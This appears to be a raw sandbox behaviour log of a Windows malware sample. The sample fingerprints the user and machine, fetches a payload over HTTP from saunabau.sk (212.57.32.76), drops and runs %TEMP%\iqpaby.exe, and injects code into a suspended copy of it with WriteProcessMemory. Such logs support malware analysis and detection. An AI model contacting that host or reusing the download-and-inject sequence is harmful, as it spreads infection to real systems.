Call System API API Name: LdrLoadDll Args: ( 2e4cc1c, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll, 6dc20000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4df74, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll, 6db00000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e16d74, 0, shfolder.dll, 70f10000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_32\mscorlib\2.0.0.0__b77a5c561934e089\secur32.dll, 0 ) Return: c0000135 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e287b4, 0, secur32.dll, 72370000 ) Return: 0 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e287b4, 0, sspicli.dll, 75570000 ) Return: 0 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetComputerNameW Args: ( NeilOffice, 19e7b8 ) Return: 1 2520 2552
Call Systeminfo API API Name: GetComputerNameW Args: ( NeilOffice, 19e7fc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19e9f4 ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 19e9fc ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19eaf8 ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 19eb00 ) Return: 1 2520 2552
Call System API API Name: LdrLoadDll Args: ( 38adbc, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll, 6d4a0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e5cb5c, 0, %windir%\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll, 64e70000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e287b4, 0, %windir%\microsoft.net\framework\v2.0.50727\mscorjit.dll, 6d440000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e60494, 0, %windir%\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll, 6d340000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\rasapi32.dll, 0 ) Return: c0000135 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rasapi32.dll, 72ba0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rtutils.dll, 72b70000 ) Return: 0 2520 2552
Add Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\ Value: None 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing Value: 0 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing Value: 0 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\FileTracingMask Value: ffff0000 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\ConsoleTracingMask Value: ffff0000 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\MaxFileSize Value: 100000 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32\FileDirectory Value: %windir%\tracing 2520 2552
Call Service API API Name: OpenServiceW Args: ( 2e66390, RASMAN, 4 ) Return: 2e662c8 2520 2552
Call System API API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\ws2_32.dll, 0 ) Return: c0000135 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ws2_32.dll, 75f70000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\mswsock.dll, 74900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\wshtcpip.dll, 74f60000 ) Return: 0 2520 2552
Call Network API API Name: socket Args: ( 2, 2, 0 ) Return: 510 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\mswsock.dll, 74900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\wship6.dll, 72fc0000 ) Return: 0 2520 2552
Call Network API API Name: socket Args: ( 23, 2, 0 ) Return: 510 2520 2552
Call Systeminfo API API Name: GetComputerNameW Args: ( NeilOffice, 3a3bd50 ) Return: 1 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 3a3f048, 0, Global\.net clr networking ) Return: 518 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 3a3f32c, 0, Global\.net clr networking ) Return: 0 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 3a3fd40, 0, Global\.net clr networking ) Return: 518 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 3a405e4, 0, Global\.net clr networking ) Return: 518 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 3a40e8c, 0, Global\.net clr networking ) Return: 518 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 3a4172c, 0, Global\.net clr networking ) Return: 518 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 3a41fc8, 0, Global\.net clr networking ) Return: 518 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 3a42870, 0, Global\.net clr networking ) Return: 518 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 3a430f4, 0, Global\.net clr networking ) Return: 518 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 3a43988, 0, Global\.net clr networking ) Return: 518 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 3a44214, 0, Global\.net clr networking ) Return: 518 2520 2552
Call Network API API Name: socket Args: ( 2, 2, 0 ) Return: 518 2520 2552
Call Network API API Name: socket Args: ( 23, 2, 0 ) Return: 528 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rasman.dll, 72b80000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rtutils.dll, 72b70000 ) Return: 0 2520 2552
Add Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\ Value: None 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\EnableFileTracing Value: 0 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\EnableConsoleTracing Value: 0 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\FileTracingMask Value: ffff0000 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\ConsoleTracingMask Value: ffff0000 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\MaxFileSize Value: 100000 2520 2552
Write Registry Key Key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS\FileDirectory Value: %windir%\tracing 2520 2552
Call Service API API Name: OpenServiceA Args: ( 2e7fe38, rasman, 4 ) Return: 2e7fe10 2520 2552
Call Service API API Name: OpenServiceA Args: ( 2e7fe10, RASMAN, 4 ) Return: 2e7fed8 2520 2552
Call System API API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\winhttp.dll, 0 ) Return: c0000135 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, winhttp.dll, 730c0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, shlwapi.dll, 75a00000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, dhcpcsvc6.dll, 72dc0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, dhcpcsvc.dll, 72ff0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ntdll.dll, 77a10000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, advapi32.dll, 755d0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, winhttp.dll, 730c0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ws2_32.dll, 75f70000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ws2_32.dll, 75f70000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, kernel32.dll, 757b0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, sspicli.dll, 75570000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, cryptsp.dll, 75330000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, credssp.dll, 70d30000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rpcrt4.dll, 75aa0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ole32.dll, 77130000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, nsi.dll, 75a90000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, cfgmgr32.dll, 770e0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, dhcpcsvc.dll, 72ff0000 ) Return: 0 2520 2552
Call Network API API Name: socket Args: ( 2, 2, 0 ) Return: 5cc 2520 2552
Call Network API API Name: socket Args: ( 23, 2, 0 ) Return: 5cc 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\mswsock.dll, 74900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, dnsapi.dll, 74880000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rpcrt4.dll, 75aa0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, rasadhlp.dll, 72b50000 ) Return: 0 2520 2552
Call Network API API Name: socket Args: ( 23, 2, 0 ) Return: 5cc 2520 2552
Call System API API Name: LdrLoadDll Args: ( 3797dc, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\iphlpapi.dll, 0 ) Return: c0000135 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, dnsapi.dll, 74880000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, iphlpapi.dll, 74850000 ) Return: 0 2520 2552
Call Network API API Name: socket Args: ( 2, 1, 6 ) Return: 5d8 2520 2552
Call Network API API Name: socket Args: ( 23, 1, 6 ) Return: 5d4 2520 2552
Call Network API API Name: socket Args: ( 2, 2, 0 ) Return: 5dc 2520 2552
Call Network API API Name: socket Args: ( 23, 2, 0 ) Return: 5dc 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\fwpuclnt.dll, 72ad0000 ) Return: 0 2520 2552
Call Network API API Name: socket Args: ( 23, 2, 0 ) Return: 5e4 2520 2552
Call Network API API Name: socket Args: ( 2, 2, 0 ) Return: 5e4 2520 2552
Call Network API API Name: socket Args: ( 23, 2, 0 ) Return: 5ec 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\nlaapi.dll, 74f50000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\napinsp.dll, 748f0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\pnrpnsp.dll, 748d0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\pnrpnsp.dll, 748d0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, %windir%\system32\winrnr.dll, 74870000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, ws2_32.dll, 75f70000 ) Return: 0 2520 2552
Call Network API API Name: connect Args: ( 5d8, 212.57.32.76:80, 16 ) Return: 0 2520 2552
Call Network API API Name: send Args: ( 5d8, GET /index.pjk HTTP/1.1\r\nHost: saunabau.sk\r\nConnection: Keep-Alive\r\n\r\n, 70, 0 ) Return: 70 2520 2552
Add File Path: %TEMP%\iqpaby.exe Type: VSDT_EXE_W32 2520 2552
Write File Path: %TEMP%\iqpaby.exe Type: VSDT_EXE_W32 2520 2552
Call Window API API Name: CreateWindowExW Args: ( 0, c03b, OleMainThreadWndName, 88000000, 80000000, 80000000, 80000000, 80000000, fffffffd, 0, 77130000, 0 ) Return: 5001c 2520 2552
Call System API API Name: LdrLoadDll Args: ( 3799e4, 0, %windir%\assembly\gac_msil\system\2.0.0.0__b77a5c561934e089\shell32.dll, 0 ) Return: c0000135 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, shell32.dll, 76400000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e96514, 0, %windir%\syswow64\urlmon.dll, 758c0000 ) Return: 0 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 6bdeab0 ) Return: 1 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, shell32.dll, 76400000 ) Return: 0 2520 2552
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1 2520 2552
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1 2520 2552
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1 2520 2552
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0 2520 2552
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass Value: 1 2520 2552
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName Value: 1 2520 2552
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet Value: 1 2520 2552
Write Registry Key Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect Value: 0 2520 2552
Call Thread API API Name: NtGetContextThread Args: ( 956, 6bddda8 ) Return: 0 2520 2552
Call Process API API Name: CreateProcessW Args: ( %TEMP%\iqpaby.exe, "%TEMP%\iqpaby.exe", , , , , , %WorkingDir%, , Process:2644:%TEMP%\iqpaby.exe ) Return: 1 2520 2552
Call Window API API Name: DestroyWindow Args: ( 5001c ) Return: 1 2520 2552
Call System API API Name: EnumProcesses Args: () Return: 1 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e98f14, 0, %windir%\microsoft.net\framework\v2.0.50727\diasymreader.dll, 5e3a0000 ) Return: 0 2520 2552
Call Filesystem API API Name: NtReadFile Args: ( 3a0, , , , , , 200, , ) Return: 0 2520 2552
Call Filesystem API API Name: NtReadFile Args: ( 3a0, , , , , , 200, , ) Return: 0 2520 2552
Call Filesystem API API Name: NtReadFile Args: ( 3a0, , , , , , 200, , ) Return: 0 2520 2552
Call Filesystem API API Name: NtReadFile Args: ( 3a0, , , , , , 200, , ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, cryptbase.dll, 75560000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, gdi32.dll, 75fc0000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 5e79e4, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2552 2644
Call Systeminfo API API Name: GetUserNameExW Args: ( 2, NeilOffice\Administrator, 19ebc0 ) Return: 1 2520 2552
Call Systeminfo API API Name: GetUserNameExW Args: ( 10002, Administrator, 19ebc8 ) Return: 1 2520 2552
Call System API API Name: LdrLoadDll Args: ( 5e79e4, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 5e79e4, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 5e79e4, 0, %windir%\system32\uxtheme.dll, 75430000 ) Return: 0 2552 2644
Call Window API API Name: CreateWindowExW Args: ( 0, c03b, OleMainThreadWndName, 88000000, 80000000, 80000000, 80000000, 80000000, fffffffd, 0, 77130000, 0 ) Return: 6001c 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, shfolder, 70f10000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, ole32.dll, 77130000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, ole32.dll, 77130000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, comctl32.dll, 72de0000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, comctl32.dll, 72de0000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, oleaut32.dll, 77050000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, advapi32.dll, 755d0000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, clbcatq.dll, 75e90000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, mscoree.dll, 72900000 ) Return: 0 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 37ca744, 0, Global\.net clr networking ) Return: 48c 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 37caa60, 0, Global\.net clr networking ) Return: 48c 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 37cad7c, 0, Global\.net clr networking ) Return: 48c 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 37cb098, 0, Global\.net clr networking ) Return: 48c 2520 2552
Call Mutex API API Name: CreateMutexW Args: ( 37cb3b4, 0, Global\.net clr networking ) Return: 48c 2520 2552
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, advapi32.dll, 755d0000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 630f74, 0, %windir%\system32\propsys.dll, 72cc0000 ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local\Microsoft\Windows\Caches, 0 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, ntmarta.dll, 74810000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, advapi32.dll, 755d0000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, shell32.dll, 76400000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, profapi.dll, 72dd0000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, apphelp.dll, 72c70000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 2efcd5c, 0, %windir%\system32\shdocvw.dll, 6d1d0000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 2efcd5c, 0, %windir%\system32\shell32.dll, 76400000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, propsys.dll, 72cc0000 ) Return: 0 2552 2644
Call System API API Name: LdrLoadDll Args: ( 56202c, 0, oleaut32.dll, 77050000 ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( %TEMP%\, 0 ) Return: 0 2552 2644
Add File Path: %TEMP%\nsu5A20.tmp Type: VSDT_EMPTY 2552 2644
Delete File Path: %TEMP%\nsu5A20.tmp Type: VSDT_EMPTY 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: NtReadFile Args: ( 228, , , , , , 200, , ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( C:\Users, 0 ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( C:\Users\ADMINI~1, 0 ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData, 0 ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local, 0 ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( %TEMP%, 0 ) Return: 0 2552 2644
Call Filesystem API API Name: SetFileTime Args: ( 1c, 2017-02-1/13:27:24, NULL, 2017-02-1/13:27:24 ) Return: 1 2552 2644
Call Filesystem API API Name: SetFileTime Args: ( 1c, 2017-02-1/12:40:32, NULL, 2017-02-1/12:40:32 ) Return: 1 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( C:\Users, 0 ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( C:\Users\ADMINI~1, 0 ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData, 0 ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( %USERPROFILE%\AppData\Local, 0 ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( %TEMP%, 0 ) Return: 0 2552 2644
Call Filesystem API API Name: CreateDirectoryW Args: ( %TEMP%\nse5AAD.tmp, 0 ) Return: 1 2552 2644
Add File Path: %TEMP%\Chaptrel.ro Type: VSDT_COM_DOS 2552 2644
Write File Path: %TEMP%\Chaptrel.ro Type: VSDT_COM_DOS 2552 2644
Add File Path: %TEMP%\monkshood.dll Type: VSDT_DLL_W32 2552 2644
%TEMP%\monkshood.dll
Add File Path: %TEMP%\nse5AAD.tmp Type: VSDT_EMPTY 2552 2644
Delete File Path: %TEMP%\nse5AAD.tmp Type: VSDT_EMPTY 2552 2644
Add File Path: %TEMP%\nse5AAD.tmp\System.dll Type: VSDT_DLL_W32 2552 2644
Write File Path: %TEMP%\nse5AAD.tmp\System.dll Type: VSDT_DLL_W32 2552 2644
Call Filesystem API API Name: DeleteFileW Args: ( %windir%\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2552.1880153 ) Return: 0 2520 2552
Call Filesystem API API Name: DeleteFileW Args: ( %windir%\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2552.1880153 ) Return: 0 2520 2552
Call Filesystem API API Name: DeleteFileW Args: ( %APPDATA%\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2552.1880168 ) Return: 0 2520 2552
Call System API API Name: LdrLoadDll Args: ( 2e4e4e4, 0, netutils.dll, 729e0000 ) Return: 0 2520 2552
Call Process API API Name: CreateProcessA Args: ( , "%TEMP%\iqpaby.exe", , , , CREATE_SUSPENDED, , , , Process:2840:%TEMP%\iqpaby.exe ) Return: 1 2552 2644
Call Thread API API Name: NtGetContextThread Args: ( 560, 3a80000 ) Return: 0 2552 2644
Call Virtual Memory API API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 400000, MZ., 1024, 0 ) Return: 1 2552 2644
Call Virtual Memory API API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 400000, MZ., 0, 18f1ec ) Return: 0 2552 2644
Call Virtual Memory API API Name: WriteProcessMemory Args: ( Process Name:2840:%TEMP%\iqpaby.exe, 453000, , 5120, 18f1ec ) Return: 1 2552 2644
